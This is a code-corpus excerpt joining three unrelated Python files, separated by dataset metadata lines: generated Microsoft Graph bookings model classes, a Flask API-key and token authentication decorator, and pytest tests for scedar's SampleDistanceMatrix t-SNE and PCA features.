"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'accuracy': {'key': 'accuracy', 'type': 'float'},
'altitude': {'key': 'altitude', 'type': 'float'},
'altitude_accuracy': {'key': 'altitudeAccuracy', 'type': 'float'},
'latitude': {'key': 'latitude', 'type': 'float'},
'longitude': {'key': 'longitude', 'type': 'float'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
accuracy: Optional[float] = None,
altitude: Optional[float] = None,
altitude_accuracy: Optional[float] = None,
latitude: Optional[float] = None,
longitude: Optional[float] = None,
**kwargs
):
super(MicrosoftGraphOutlookGeoCoordinates, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.accuracy = accuracy
self.altitude = altitude
self.altitude_accuracy = altitude_accuracy
self.latitude = latitude
self.longitude = longitude
class MicrosoftGraphPhysicalAddress(msrest.serialization.Model):
"""physicalAddress.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param city: The city.
:type city: str
:param country_or_region: The country or region. It's a free-format string value, for example,
'United States'.
:type country_or_region: str
:param postal_code: The postal code.
:type postal_code: str
:param post_office_box:
:type post_office_box: str
:param state: The state.
:type state: str
:param street: The street.
:type street: str
:param type: Possible values include: "unknown", "home", "business", "other".
:type type: str or ~bookings.models.MicrosoftGraphPhysicalAddressType
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'city': {'key': 'city', 'type': 'str'},
'country_or_region': {'key': 'countryOrRegion', 'type': 'str'},
'postal_code': {'key': 'postalCode', 'type': 'str'},
'post_office_box': {'key': 'postOfficeBox', 'type': 'str'},
'state': {'key': 'state', 'type': 'str'},
'street': {'key': 'street', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
city: Optional[str] = None,
country_or_region: Optional[str] = None,
postal_code: Optional[str] = None,
post_office_box: Optional[str] = None,
state: Optional[str] = None,
street: Optional[str] = None,
type: Optional[Union[str, "MicrosoftGraphPhysicalAddressType"]] = None,
**kwargs
):
super(MicrosoftGraphPhysicalAddress, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.city = city
self.country_or_region = country_or_region
self.postal_code = postal_code
self.post_office_box = post_office_box
self.state = state
self.street = street
self.type = type
class OdataError(msrest.serialization.Model):
"""OdataError.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param error: Required.
:type error: ~bookings.models.OdataErrorMain
"""
_validation = {
'error': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'error': {'key': 'error', 'type': 'OdataErrorMain'},
}
def __init__(
self,
*,
error: "OdataErrorMain",
additional_properties: Optional[Dict[str, object]] = None,
**kwargs
):
super(OdataError, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.error = error
class OdataErrorDetail(msrest.serialization.Model):
"""OdataErrorDetail.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param code: Required.
:type code: str
:param message: Required.
:type message: str
:param target:
:type target: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
}
def __init__(
self,
*,
code: str,
message: str,
additional_properties: Optional[Dict[str, object]] = None,
target: Optional[str] = None,
**kwargs
):
super(OdataErrorDetail, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.code = code
self.message = message
self.target = target
class OdataErrorMain(msrest.serialization.Model):
"""OdataErrorMain.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param code: Required.
:type code: str
:param message: Required.
:type message: str
:param target:
:type target: str
:param details:
:type details: list[~bookings.models.OdataErrorDetail]
:param innererror: The structure of this object is service-specific.
:type innererror: dict[str, object]
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[OdataErrorDetail]'},
'innererror': {'key': 'innererror', 'type': '{object}'},
}
def __init__(
self,
*,
code: str,
message: str,
additional_properties: Optional[Dict[str, object]] = None,
target: Optional[str] = None,
details: Optional[List["OdataErrorDetail"]] = None,
innererror: Optional[Dict[str, object]] = None,
**kwargs
):
super(OdataErrorMain, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.code = code
self.message = message
self.target = target
self.details = details
self.innererror = innererror
class Paths1Bomg32BookingbusinessesBookingbusinessIdCalendarviewBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1Bomg32BookingbusinessesBookingbusinessIdCalendarviewBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param cancellation_message:
:type cancellation_message: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'cancellation_message': {'key': 'cancellationMessage', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
cancellation_message: Optional[str] = None,
**kwargs
):
super(Paths1Bomg32BookingbusinessesBookingbusinessIdCalendarviewBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.cancellation_message = cancellation_message
class Paths1K88Cl0BookingbusinessesBookingbusinessIdAppointmentsBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths1K88Cl0BookingbusinessesBookingbusinessIdAppointmentsBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param cancellation_message:
:type cancellation_message: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'cancellation_message': {'key': 'cancellationMessage', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
cancellation_message: Optional[str] = None,
**kwargs
):
super(Paths1K88Cl0BookingbusinessesBookingbusinessIdAppointmentsBookingappointmentIdMicrosoftGraphCancelPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.cancellation_message = cancellation_message
| 1.882813 | 2 |
backend/pastry/resources/auth.py | cloughrm/Pastry | 0 | 12762195 | from functools import wraps
from pastry.models import User
from flask import request, abort, jsonify
def parse_api_key():
key = None
if request.args.get('api_key'):
key = request.args.get('api_key')
elif request.form.get('api_key'):
key = request.form.get('api_key')
return key
def login_required(f):
@wraps(f)
def decorated(*args, **kwargs):
if request.method != 'OPTIONS':
# Verify auth-token or api_key is present
token = request.headers.get('Auth-Token')
api_key = parse_api_key()
if not token and not api_key:
abort(401)
# Verify key/token
if api_key:
if not User.verify_api_key(api_key):
response = jsonify({
'message': 'Invalid API Key',
'invalid_api_key': True,
})
response.status_code = 401
return response
elif token:
if not User.verify_auth_token(token):
response = jsonify({
'message': 'Expired Token',
'expired_token': True,
})
response.status_code = 401
return response
return f(*args, **kwargs)
return decorated
| 2.609375 | 3 |
tests/test_eda/test_no_pdist_sdm.py | logstar/scedar | 17 | 12762196 | <gh_stars>10-100
import numpy as np
import matplotlib as mpl
mpl.use("agg", warn=False) # noqa
import matplotlib.pyplot as plt
import seaborn as sns
import sklearn.metrics.pairwise
import scipy.cluster.hierarchy as sch
import scipy.sparse as spsp
import scedar.eda as eda
import pytest
class TestNoPdistSampleDistanceMatrix(object):
"""docstring for TestSampleDistanceMatrix"""
x_3x2 = spsp.csr_matrix([[0, 0], [1, 1], [2, 2]])
x_2x4_spsp = spsp.csr_matrix(np.array([[0, 1, 2, 3], [1, 2, 0, 6]]))
x_2x4_arr = np.array([[0, 1, 2, 3], [1, 2, 0, 6]])
def test_valid_init(self):
sdm = eda.SampleDistanceMatrix(self.x_3x2, metric='euclidean',
use_pdist=False)
with pytest.raises(ValueError) as excinfo:
sdm.d
with pytest.raises(ValueError) as excinfo:
sdm3 = eda.SampleDistanceMatrix(
self.x_2x4_spsp, metric='correlation', use_pdist=False,
nprocs=5).d
dist_mat = np.array([[0, np.sqrt(2), np.sqrt(8)],
[np.sqrt(2), 0, np.sqrt(2)],
[np.sqrt(8), np.sqrt(2), 0]])
with pytest.raises(ValueError) as excinfo:
sdm4 = eda.SampleDistanceMatrix(
self.x_3x2, dist_mat, use_pdist=False)
sdm5 = eda.SampleDistanceMatrix([[1, 2]], metric='euclidean',
use_pdist=False)
assert sdm5.tsne(n_iter=250).shape == (1, 2)
def test_empty_init(self):
with pytest.raises(ValueError) as excinfo:
eda.SampleDistanceMatrix(np.empty(0), metric='euclidean')
sdm = eda.SampleDistanceMatrix(
np.empty((0, 0)), metric='euclidean', use_pdist=False)
assert len(sdm.sids) == 0
assert len(sdm.fids) == 0
assert sdm._x.shape == (0, 0)
with pytest.raises(ValueError) as excinfo:
assert sdm._d.shape == (0, 0)
with pytest.raises(ValueError) as excinfo:
assert sdm._col_sorted_d.shape == (0, 0)
with pytest.raises(ValueError) as excinfo:
assert sdm._col_argsorted_d.shape == (0, 0)
assert sdm.tsne(n_iter=250).shape == (0, 0)
def test_init_wrong_metric(self):
# when d is None, metric cannot be precomputed
with pytest.raises(Exception) as excinfo:
eda.SampleDistanceMatrix(
self.x_3x2, metric='precomputed', use_pdist=False)
# lazy load d
eda.SampleDistanceMatrix(self.x_3x2, metric='unknown', use_pdist=False)
with pytest.raises(Exception) as excinfo:
eda.SampleDistanceMatrix(
self.x_3x2, metric='unknown', use_pdist=False).d
eda.SampleDistanceMatrix(self.x_3x2, metric=1, use_pdist=False)
with pytest.raises(Exception) as excinfo:
eda.SampleDistanceMatrix(self.x_3x2, metric=1, use_pdist=False).d
eda.SampleDistanceMatrix(self.x_3x2, metric=1., use_pdist=False)
with pytest.raises(Exception) as excinfo:
eda.SampleDistanceMatrix(self.x_3x2, metric=1., use_pdist=False).d
eda.SampleDistanceMatrix(self.x_3x2, metric=('euclidean', ),
use_pdist=False)
with pytest.raises(Exception) as excinfo:
eda.SampleDistanceMatrix(
self.x_3x2, metric=('euclidean', ), use_pdist=False).d
eda.SampleDistanceMatrix(self.x_3x2, metric=['euclidean'],
use_pdist=False)
with pytest.raises(Exception) as excinfo:
eda.SampleDistanceMatrix(self.x_3x2, metric=['euclidean'],
use_pdist=False).d
def test_sort_features(self):
x = np.array([[0, 2, 30, 10],
[1, 2, 30, 10],
[0, 3, 33, 10],
[2, 5, 30, 7],
[2, 5, 30, 9]])
x = spsp.csr_matrix(x)
sdm = eda.SampleDistanceMatrix(
x, metric='euclidean', use_pdist=False)
sdm2 = eda.SampleDistanceMatrix(
x, metric='euclidean', use_pdist=False)
sdm2.sort_features(fdist_metric='euclidean', optimal_ordering=True)
assert sdm2.fids == [2, 3, 1, 0]
def test_get_tsne_kv(self):
tmet = 'euclidean'
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
assert sdm.get_tsne_kv(1) is None
assert sdm.get_tsne_kv(1) is None
assert sdm.get_tsne_kv(0) is None
assert sdm.get_tsne_kv(2) is None
def test_get_tsne_kv_wrong_args(self):
tmet = 'euclidean'
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
with pytest.raises(ValueError) as excinfo:
sdm.get_tsne_kv([1, 2, 3])
with pytest.raises(ValueError) as excinfo:
sdm.get_tsne_kv({1: 2})
def test_put_tsne_wrong_args(self):
tmet = 'euclidean'
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
with pytest.raises(ValueError) as excinfo:
sdm.put_tsne(1, [1, 2, 3])
with pytest.raises(ValueError) as excinfo:
sdm.put_tsne({1: 2}, [1, 2, 3])
def test_tsne(self):
tmet = 'euclidean'
tsne_kwargs = {'metric': tmet, 'n_iter': 250,
'random_state': 123}
ref_tsne = eda.tsne(self.x_3x2.toarray(), **tsne_kwargs)
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
assert sdm.tsne_lut == {}
tsne1 = sdm.tsne(n_iter=250, random_state=123)
np.testing.assert_allclose(ref_tsne, tsne1)
np.testing.assert_allclose(ref_tsne, sdm._last_tsne)
assert tsne1.shape == (3, 2)
assert len(sdm.tsne_lut) == 1
tsne2 = sdm.tsne(store_res=False, **tsne_kwargs)
np.testing.assert_allclose(ref_tsne, tsne2)
assert len(sdm.tsne_lut) == 1
with pytest.raises(Exception) as excinfo:
wrong_metric_kwargs = tsne_kwargs.copy()
wrong_metric_kwargs['metric'] = 'correlation'
sdm.tsne(**wrong_metric_kwargs)
assert len(sdm.tsne_lut) == 1
with pytest.raises(Exception) as excinfo:
sdm.tsne(metric='precomputed')
tsne3 = sdm.tsne(store_res=True, **tsne_kwargs)
np.testing.assert_allclose(ref_tsne, tsne3)
# (param, ind) as key, so same params get an extra entry.
assert len(sdm.tsne_lut) == 2
np.testing.assert_allclose(tsne1, sdm.get_tsne_kv(1)[1])
np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(2)[1])
assert tsne1 is not sdm.get_tsne_kv(1)[1]
assert tsne3 is not sdm.get_tsne_kv(2)[1]
tsne4 = sdm.tsne(store_res=True, n_iter=250, random_state=123)
np.testing.assert_allclose(ref_tsne, tsne4)
np.testing.assert_allclose(sdm.get_tsne_kv(3)[1], tsne4)
assert len(sdm.tsne_lut) == 3
tsne5 = sdm.tsne(store_res=True, n_iter=251, random_state=123)
tsne6 = sdm.tsne(store_res=True, n_iter=251, random_state=123)
np.testing.assert_allclose(tsne6, tsne5)
np.testing.assert_allclose(tsne5, sdm.get_tsne_kv(4)[1])
np.testing.assert_allclose(tsne6, sdm.get_tsne_kv(5)[1])
assert len(sdm.tsne_lut) == 5
def test_par_tsne(self):
tmet = 'euclidean'
param_list = [{'metric': tmet, 'n_iter': 250, 'random_state': 123},
{'metric': tmet, 'n_iter': 250, 'random_state': 125},
{'metric': tmet, 'n_iter': 250, 'random_state': 123}]
ref_tsne = eda.tsne(self.x_3x2.toarray(), **param_list[0])
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
# If not store, should not update lut
sdm.par_tsne(param_list, store_res=False)
assert sdm._lazy_load_last_tsne is None
assert sdm.tsne_lut == {}
# store results
tsne1, tsne2, tsne3 = sdm.par_tsne(param_list)
np.testing.assert_allclose(ref_tsne, tsne1)
np.testing.assert_allclose(ref_tsne, tsne3)
np.testing.assert_allclose(ref_tsne, sdm._last_tsne)
assert tsne1.shape == (3, 2)
assert len(sdm.tsne_lut) == 3
np.testing.assert_allclose(tsne1, sdm.get_tsne_kv(1)[1])
np.testing.assert_allclose(tsne2, sdm.get_tsne_kv(2)[1])
np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(3)[1])
np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(1)[1])
def test_par_tsne_mp(self):
tmet = 'euclidean'
param_list = [{'metric': tmet, 'n_iter': 250, 'random_state': 123},
{'metric': tmet, 'n_iter': 250, 'random_state': 125},
{'metric': tmet, 'n_iter': 250, 'random_state': 123}]
ref_tsne = eda.tsne(self.x_3x2.toarray(), **param_list[0])
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
# If not store, should not update lut
sdm.par_tsne(param_list, store_res=False, nprocs=3)
assert sdm._lazy_load_last_tsne is None
assert sdm.tsne_lut == {}
# store results
tsne1, tsne2, tsne3 = sdm.par_tsne(param_list, nprocs=3)
np.testing.assert_allclose(ref_tsne, tsne1)
np.testing.assert_allclose(ref_tsne, tsne3)
np.testing.assert_allclose(ref_tsne, sdm._last_tsne)
assert tsne1.shape == (3, 2)
assert len(sdm.tsne_lut) == 3
np.testing.assert_allclose(tsne1, sdm.get_tsne_kv(1)[1])
np.testing.assert_allclose(tsne2, sdm.get_tsne_kv(2)[1])
np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(3)[1])
np.testing.assert_allclose(tsne3, sdm.get_tsne_kv(1)[1])
def test_tsne_default_init(self):
tmet = 'euclidean'
tsne_kwargs = {'metric': tmet, 'n_iter': 250,
'random_state': 123}
ref_tsne = eda.tsne(self.x_3x2.toarray(), **tsne_kwargs)
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
init_tsne = sdm._last_tsne
assert init_tsne.shape == (3, 2)
assert len(sdm.tsne_lut) == 1
tsne2 = sdm.tsne(store_res=True, **tsne_kwargs)
np.testing.assert_allclose(ref_tsne, tsne2)
assert len(sdm.tsne_lut) == 2
def test_ind_x(self):
sids = list("abcdef")
fids = list(range(10, 20))
sdm = eda.SampleDistanceMatrix(
np.random.ranf(60).reshape(6, -1),
sids=sids, fids=fids, use_pdist=False)
# select sf
ss_sdm = sdm.ind_x([0, 5], list(range(9)))
assert ss_sdm._x.shape == (2, 9)
assert ss_sdm.sids == ['a', 'f']
assert ss_sdm.fids == list(range(10, 19))
with pytest.raises(Exception) as excinfo:
ss_sdm.d
# select with Default
ss_sdm = sdm.ind_x()
assert ss_sdm._x.shape == (6, 10)
assert ss_sdm.sids == list("abcdef")
assert ss_sdm.fids == list(range(10, 20))
with pytest.raises(Exception) as excinfo:
ss_sdm.d
# select with None
ss_sdm = sdm.ind_x(None, None)
assert ss_sdm._x.shape == (6, 10)
assert ss_sdm.sids == list("abcdef")
assert ss_sdm.fids == list(range(10, 20))
with pytest.raises(Exception) as excinfo:
ss_sdm.d
# select non-existent inds
with pytest.raises(IndexError) as excinfo:
sdm.ind_x([6])
with pytest.raises(IndexError) as excinfo:
sdm.ind_x(None, ['a'])
def test_ind_x_empty(self):
sids = list("abcdef")
fids = list(range(10, 20))
sdm = eda.SampleDistanceMatrix(
np.random.ranf(60).reshape(6, -1), sids=sids, fids=fids,
use_pdist=False)
empty_s = sdm.ind_x([])
assert empty_s._x.shape == (0, 10)
with pytest.raises(Exception) as excinfo:
empty_s._d
assert empty_s._sids.shape == (0,)
assert empty_s._fids.shape == (10,)
empty_f = sdm.ind_x(None, [])
assert empty_f._x.shape == (6, 0)
with pytest.raises(Exception) as excinfo:
empty_f._d
assert empty_f._sids.shape == (6,)
assert empty_f._fids.shape == (0,)
empty_sf = sdm.ind_x([], [])
assert empty_sf._x.shape == (0, 0)
with pytest.raises(Exception) as excinfo:
empty_sf._d
assert empty_sf._sids.shape == (0,)
assert empty_sf._fids.shape == (0,)
def test_id_x(self):
sids = list("abcdef")
fids = list(range(10, 20))
sdm = eda.SampleDistanceMatrix(
np.random.ranf(60).reshape(6, -1),
sids=sids, fids=fids, use_pdist=False)
# select sf
ss_sdm = sdm.id_x(['a', 'f'], list(range(10, 15)))
assert ss_sdm._x.shape == (2, 5)
assert ss_sdm.sids == ['a', 'f']
assert ss_sdm.fids == list(range(10, 15))
with pytest.raises(Exception) as excinfo:
ss_sdm.d
# select with Default
ss_sdm = sdm.id_x()
assert ss_sdm._x.shape == (6, 10)
assert ss_sdm.sids == list("abcdef")
assert ss_sdm.fids == list(range(10, 20))
with pytest.raises(Exception) as excinfo:
ss_sdm.d
# select with None
ss_sdm = sdm.id_x(None, None)
assert ss_sdm._x.shape == (6, 10)
assert ss_sdm.sids == list("abcdef")
assert ss_sdm.fids == list(range(10, 20))
with pytest.raises(Exception) as excinfo:
ss_sdm.d
# select non-existent inds
# id lookup raises ValueError
with pytest.raises(ValueError) as excinfo:
sdm.id_x([6])
with pytest.raises(ValueError) as excinfo:
sdm.id_x(None, ['a'])
def test_id_x_empty(self):
sids = list("abcdef")
fids = list(range(10, 20))
sdm = eda.SampleDistanceMatrix(
np.random.ranf(60).reshape(6, -1),
sids=sids, fids=fids, use_pdist=False)
empty_s = sdm.id_x([])
assert empty_s._x.shape == (0, 10)
with pytest.raises(Exception) as excinfo:
empty_s._d
assert empty_s._sids.shape == (0,)
assert empty_s._fids.shape == (10,)
empty_f = sdm.id_x(None, [])
assert empty_f._x.shape == (6, 0)
with pytest.raises(Exception) as excinfo:
empty_f._d
assert empty_f._sids.shape == (6,)
assert empty_f._fids.shape == (0,)
empty_sf = sdm.id_x([], [])
assert empty_sf._x.shape == (0, 0)
with pytest.raises(Exception) as excinfo:
empty_sf._d
assert empty_sf._sids.shape == (0,)
assert empty_sf._fids.shape == (0,)
def test_getter(self):
tmet = 'euclidean'
sdm = eda.SampleDistanceMatrix(
self.x_3x2, metric=tmet, use_pdist=False)
with pytest.raises(Exception) as excinfo:
sdm.d
assert sdm.metric == tmet
assert sdm.tsne_lut == {}
assert sdm.tsne_lut is not sdm._tsne_lut
assert sdm.tsne_lut == sdm._tsne_lut
sdm.tsne(n_iter=250)
assert sdm.tsne_lut is not sdm._tsne_lut
for k in sdm.tsne_lut:
np.testing.assert_equal(sdm.tsne_lut[k], sdm._tsne_lut[k])
def test_s_ith_nn_d(self):
nn_sdm = eda.SampleDistanceMatrix([[0], [1], [5], [6], [10], [20]],
metric='euclidean', use_pdist=False)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_ith_nn_d(0)
def test_s_ith_nn_ind(self):
nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
[6, 6, 6], [10, 10, 10],
[20, 20, 20]],
metric='euclidean',
use_pdist=False)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_ith_nn_ind(0)
def test_knn_ind_lut(self):
nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
[6, 6, 6], [10, 10, 10],
[20, 20, 20]],
metric='euclidean', use_pdist=False)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(0)
@pytest.mark.mpl_image_compare
def test_sdm_tsne_feature_gradient_plot(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.tsne_feature_gradient_plot(
'5', figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_tsne_feature_gradient_plus10_plot(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.tsne_feature_gradient_plot(
'5', transform=lambda x: x + 10, figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_tsne_feature_gradient_plot_sslabs(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
sdm.tsne_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels='a',
transform=lambda x: np.log(x+1),
figsize=(10, 10), s=50)
fig = sdm.tsne_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels='a',
figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_tsne_feature_gradient_plot_sslabs_empty(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.tsne_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=[],
figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
def test_sdm_tsne_feature_gradient_plot_sslabs_wrong_args(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
# Mismatch labels
with pytest.raises(ValueError) as excinfo:
sdm.tsne_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=[11],
figsize=(10, 10), s=50)
with pytest.raises(ValueError) as excinfo:
sdm.tsne_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=['i'],
figsize=(10, 10), s=50)
# labels not provided
with pytest.raises(ValueError) as excinfo:
sdm.tsne_feature_gradient_plot(
'5', selected_labels=[11], figsize=(10, 10), s=50)
def test_sdm_tsne_feature_gradient_plot_wrong_args(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x, sids=sids, fids=fids, use_pdist=False)
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot('5', transform=2)
# wrong labels size
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[])
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[1])
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[2])
# wrong gradient length
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot([0, 1])
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot(-1)
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot(5)
with pytest.raises(ValueError):
sdm.tsne_feature_gradient_plot('123')
@pytest.mark.mpl_image_compare
def test_sdm_tsne_plot(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
g = x_sorted[:, 5]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
return sdm.tsne_plot(g, figsize=(10, 10), s=50)
@pytest.mark.mpl_image_compare
def test_sdm_pca_feature_gradient_plot(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.pca_feature_gradient_plot(
'5', figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_pca_feature_gradient_plus10_plot(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.pca_feature_gradient_plot(
'5', transform=lambda x: x + 10, figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_pca_feature_gradient_plot_sslabs(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
sdm.pca_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels='a',
transform=lambda x: np.log(x+1),
figsize=(10, 10), s=50)
fig = sdm.pca_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels='a',
figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_pca_feature_gradient_plot_sslabs_empty(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.pca_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=[],
figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
def test_sdm_pca_feature_gradient_plot_sslabs_wrong_args(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
